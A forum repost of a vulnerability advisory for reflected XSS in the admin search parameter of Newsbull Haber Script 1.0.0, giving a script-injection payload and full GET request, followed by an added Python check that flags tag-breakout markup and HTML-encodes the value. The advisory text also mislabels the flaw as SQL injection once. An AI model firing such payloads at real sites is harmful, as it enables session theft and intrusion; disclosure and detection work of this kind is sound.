Newsbull Haber Script XSS Vuln.
by Adient - May 30, 2019 at 10:55 PM
####################################################################


# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Vicroity 
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

####################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# You can see the vulnerability by using the XSS code as specified in the poc section.
# The proof of the deficit is in the link below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg

####################################################################

# POC - XSS
# Parameters : search
# Attack Pattern : ‘"--></style></Script><Script>alert(0x007454)</Script>
# GET Request : http://localhost/newsbull/admin/category/records?search=‘"--></style></Script><Script>alert(0x007454)</Script>

####################################################################
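
A defender-side check for the reflected `search` parameter described in the post, as an added example that is not part of the original post or of the Newsbull code base. It flags requests whose decoded `search` value contains tag-breakout markup, and shows the value rendered with HTML encoding. The function names, the `<input>` markup and the sample requests are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Markup that lets a reflected value leave its context and open a new
# script block: a closing style/script tag, an opening script tag, or "-->".
BREAKOUT = re.compile(r"</\s*(?:style|script)\b|<\s*script\b|-->", re.IGNORECASE)


def search_values(url):
    """Return the percent-decoded values of the `search` query parameter."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("search", [])


def is_suspicious(url):
    """True when any `search` value contains tag-breakout markup."""
    return any(BREAKOUT.search(value) for value in search_values(url))


def render_search_box(value):
    """Reflect the value with HTML encoding (assumed attribute context)."""
    encoded = html.escape(value, quote=True)  # encodes < > & " '
    return '<input type="text" name="search" value="{}">'.format(encoded)


# Constructed sample requests: one ordinary search, one shaped like the
# pattern in the post (percent-encoded as a browser would send it).
SAMPLES = [
    "http://localhost/newsbull/admin/category/records?search=spor",
    "http://localhost/newsbull/admin/category/records?search="
    "%22--%3E%3C/style%3E%3C/Script%3E%3CScript%3Ealert(0x007454)%3C/Script%3E",
]

if __name__ == "__main__":
    for url in SAMPLES:
        verdict = "FLAG" if is_suspicious(url) else "ok"
        print(verdict, url)
        for value in search_values(url):
            print("   rendered:", render_search_box(value))
```

Encoding at output is the fix; the pattern match is only a log or WAF triage aid and should not be relied on as the sole control.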